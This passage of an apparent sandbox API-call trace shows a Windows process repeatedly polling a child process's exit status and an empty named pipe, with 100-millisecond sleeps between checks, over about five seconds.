dwMilliseconds=0x0) returned 0x102 [0264.490] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0264.490] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0264.491] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0264.491] Sleep (dwMilliseconds=0x64) [0264.599] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0264.599] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0264.599] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0264.599] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0264.599] Sleep (dwMilliseconds=0x64) [0264.708] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0264.708] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0264.708] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0264.708] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0264.708] Sleep (dwMilliseconds=0x64) [0264.828] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0264.828] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0264.829] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0264.829] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0264.829] Sleep (dwMilliseconds=0x64) [0264.926] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0264.926] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0264.926] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0264.926] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0264.927] Sleep (dwMilliseconds=0x64) [0265.083] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0265.083] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0265.083] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0265.083] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0265.083] Sleep (dwMilliseconds=0x64) [0265.222] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0265.223] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0265.223] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0265.223] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0265.223] Sleep (dwMilliseconds=0x64) [0265.333] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0265.333] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0265.333] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0265.333] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0265.334] Sleep (dwMilliseconds=0x64) [0265.442] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0265.442] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0265.442] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0265.442] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0265.442] Sleep (dwMilliseconds=0x64) [0265.551] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0265.551] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0265.551] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0265.551] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0265.551] Sleep (dwMilliseconds=0x64) [0265.671] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0265.671] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0265.671] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0265.671] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0265.671] Sleep (dwMilliseconds=0x64) [0265.768] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0265.768] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0265.768] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0265.769] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0265.769] Sleep (dwMilliseconds=0x64) [0265.891] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0265.892] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0265.892] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0265.892] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0265.892] Sleep (dwMilliseconds=0x64) [0265.987] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0265.987] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0265.987] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0265.987] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0265.987] Sleep (dwMilliseconds=0x64) [0266.096] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0266.096] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0266.096] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0266.096] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0266.096] Sleep (dwMilliseconds=0x64) [0266.377] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0266.377] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0266.377] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0266.377] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0266.377] Sleep (dwMilliseconds=0x64) [0266.486] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0266.486] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0266.486] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0266.486] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0266.486] Sleep (dwMilliseconds=0x64) [0266.657] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0266.658] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0266.658] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0266.658] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0266.658] Sleep (dwMilliseconds=0x64) [0267.094] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0267.094] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0267.095] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0267.095] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0267.095] Sleep (dwMilliseconds=0x64) [0267.437] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0267.437] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0267.437] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0267.438] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0267.438] Sleep (dwMilliseconds=0x64) [0267.975] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0267.975] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0267.975] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0267.976] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0267.976] Sleep (dwMilliseconds=0x64) [0268.087] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0268.087] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0268.087] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0268.087] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0268.087] Sleep (dwMilliseconds=0x64) [0268.187] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0268.187] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0268.187] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0268.188] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0268.188] Sleep (dwMilliseconds=0x64) [0268.389] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0268.389] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0268.389] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0268.389] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0268.390] Sleep (dwMilliseconds=0x64) [0268.701] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0268.701] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0268.702] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0268.702] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0268.702] Sleep (dwMilliseconds=0x64) [0268.970] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0268.970] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0268.970] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0268.970] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0268.970] Sleep (dwMilliseconds=0x64) [0269.076] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0269.076] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0269.076] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0269.076] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0269.076] Sleep (dwMilliseconds=0x64) [0269.313] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0269.313] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0269.313] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0269.313] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0269.313] Sleep (dwMilliseconds=0x64) [0269.419] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0269.419] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0269.420] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0269.420] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0269.420] Sleep (dwMilliseconds=0x64) [0269.528] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0269.528] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0269.528] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0269.528] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, 